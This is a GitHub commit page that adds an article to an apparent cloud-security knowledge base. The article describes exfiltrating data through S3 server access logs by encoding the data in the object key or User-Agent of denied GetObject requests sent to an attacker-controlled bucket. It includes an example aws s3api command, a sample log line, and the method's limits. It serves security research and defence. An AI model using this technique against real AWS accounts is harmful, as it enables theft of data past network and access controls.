Skip to content

Commit

Permalink
Merge pull request #303 from costasko/s3_server_access_logs
Browse files Browse the repository at this point in the history
S3 server access logs
  • Loading branch information
Frichetten authored Dec 8, 2023
2 parents f701793 + 5a918c3 commit 5c9c543
Showing 1 changed file with 53 additions and 0 deletions.
53 changes: 53 additions & 0 deletions content/aws/exploitation/s3_server_access_logs.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,53 @@
---
author_name: Costas Kourmpoglou
title: Data Exfiltration through S3 Server Access Logs
description: Exfiltrate data via S3:GetObject and S3 server access logs.
---

# Data Exfiltration through S3 Server Access Logs

<div class="grid cards" markdown>

- :material-account:{ .lg .middle } __Original Research__

---

<aside style="display:flex">
<p><a href="https://airwalkreply.com/cloud-services-as-exfiltration-mechanisms">Cloud services as exfiltration mechanisms</a> by <a href="https://www.linkedin.com/in/costas-kou/">Costas Kourmpoglou</a></p>
</aside>

</div>

If we have control over an IAM identity that allows `s3:GetObject`, depending on the network access to the S3 service, we can use S3 server access logs to a bucket _we_ control, and use it to exfiltrate data.

With server access logging, every request to our S3 bucket will be logged to a separate logging bucket. This includes internal AWS requests, or requests made via the AWS console.
Even if a request is denied, the payload that the request is carrying, will be sent to our logging bucket. We can then send `GetObject` requests to s3 buckets, that we don't have access to, but because we control the server access logs, we will still receive the data that we want to exfiltrate in the first place.

# How

We'll create an S3 bucket, `AttackerBucket` in our account with [server access logging](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html).
Let's name the logging bucket `AttackerBucketLogs`.
With our data in hand `ExampleDataToExfiltrate`, we will send a `GetObject` request to our bucket, for example:

`aws s3api get-object --bucket AttackerBucket --key ExampleDataToExfiltrate`

The request will be denied. However the attempt along with the other details, including our key `ExampleDatatoExfiltrate` - which is the data we're exfiltrating - will arrive to our logging bucket `AttackerBucketLogs`.

We'll receive the data in the default logging format:

```
[..] attackerbucket […] 8.8.8.8 – […] REST.GET.OBJECT ExampleDataToExfiltrate "GET / ExampleDataToExfiltrate HTTP/1.1" 403 AccessDenied 243 - 18 - "-" "UserAgentAlsoHasData " – […]
```

We're exfiltrating data, using the Key parameter of the request. There's a hard limit of 1024 bytes per Key, but other request fields can be used like User-Agent.

# Challenges

There are two challenges with this method:

1. If the network access to the S3 service takes place over a VPC endpoint, then the policy of the VPC endpoint would need to allow access to our bucket.
The VPC endpoint will drop the request and will not forward it to the S3 service, if the policy doesn't allow it. The S3 service won't be able to generate logs, and we won't be able to exfiltrate data.

2. The logs are not guaranteed to arrive in order. If you're splitting data across multiple requests, you'll need to figure out a mechanism to re-order the data correctly.

For the general usecase where network access to the S3 service takes place over the internet, there is a 10-120 minute delay, in the log delivery.

0 comments on commit 5c9c543

Please sign in to comment.